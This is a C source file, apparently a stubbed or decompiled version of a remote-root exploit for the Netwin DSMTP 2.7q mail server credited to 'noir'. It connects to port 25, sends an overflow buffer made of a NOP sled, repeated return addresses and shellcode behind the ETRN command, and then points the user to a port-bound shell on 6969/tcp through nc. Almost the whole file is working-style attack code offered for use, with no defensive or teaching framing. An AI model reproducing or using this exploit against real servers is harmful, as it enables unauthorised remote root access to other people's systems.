
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int servaddr ;
typedef int ovf ;


 int AF_INET ;
 int ALIGN ;
 int IPPROTO_TCP ;
 int NOP ;
 int RET_MDK70 ;
 int SOCK_STREAM ;
 int STDOUT_FILENO ;
 int atoi (char*) ;
 int bzero (struct sockaddr_in*,int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int herror (char*) ;
 int htons (int) ;
 int memcpy (unsigned char*,char*,int) ;
 int memset (unsigned char*,int ,int) ;
 int perror (char*) ;
 int printf (char*) ;
 int read (int,char*,int) ;
 int resolv (char*,int *) ;
 unsigned char* shellcode ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int strcpy (unsigned char*,char*) ;
 int strlen (unsigned char*) ;
 int write (int,...) ;

int
main(int argc, char *argv[])
{

        int fd, n;
        int i, l;
        unsigned char ovf[860];
        char buff[200];
        int offset = 0;
        struct sockaddr_in servaddr;
        if (argc < 2 ){
        fprintf(stderr,"%s <host> [offset]\n",argv[0]);
        exit(0);
        }
      if(argv[2])
         offset=atoi(argv[2]);
printf("Netwin DSMTP v2.7q remote-root exploit by noir\n");
        if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
        perror("socket");
        exit(-1);
        }

        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_port = htons(25);
        if(!resolv(argv[1], &servaddr.sin_addr)){
        herror("gethostbyname");
        exit(-1); }

        if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
        perror("connect");
        exit(-1);
        }

        n = read(fd, buff, 1024);
        write(STDOUT_FILENO, buff, n);
        sleep(2);
        fprintf(stderr, "check for portshell 6969/tcp when done\n");

        memset(ovf, NOP, sizeof(ovf));
        for( i = ALIGN; i < 300; i+=4)
        *(long *) &ovf[i] = RET_MDK70 + offset;
        for( i = 650, l = 0; l < strlen(shellcode) ;i++, l++)
        ovf[i] = shellcode[l];
        memcpy(ovf, "ETRN ", 5);
        strcpy(ovf+858,"\r\n\0");
        write(fd, ovf, strlen(ovf));
        fprintf(stderr,"done!\n$ nc %s 6969\n", argv[1]);
        return 1;
}
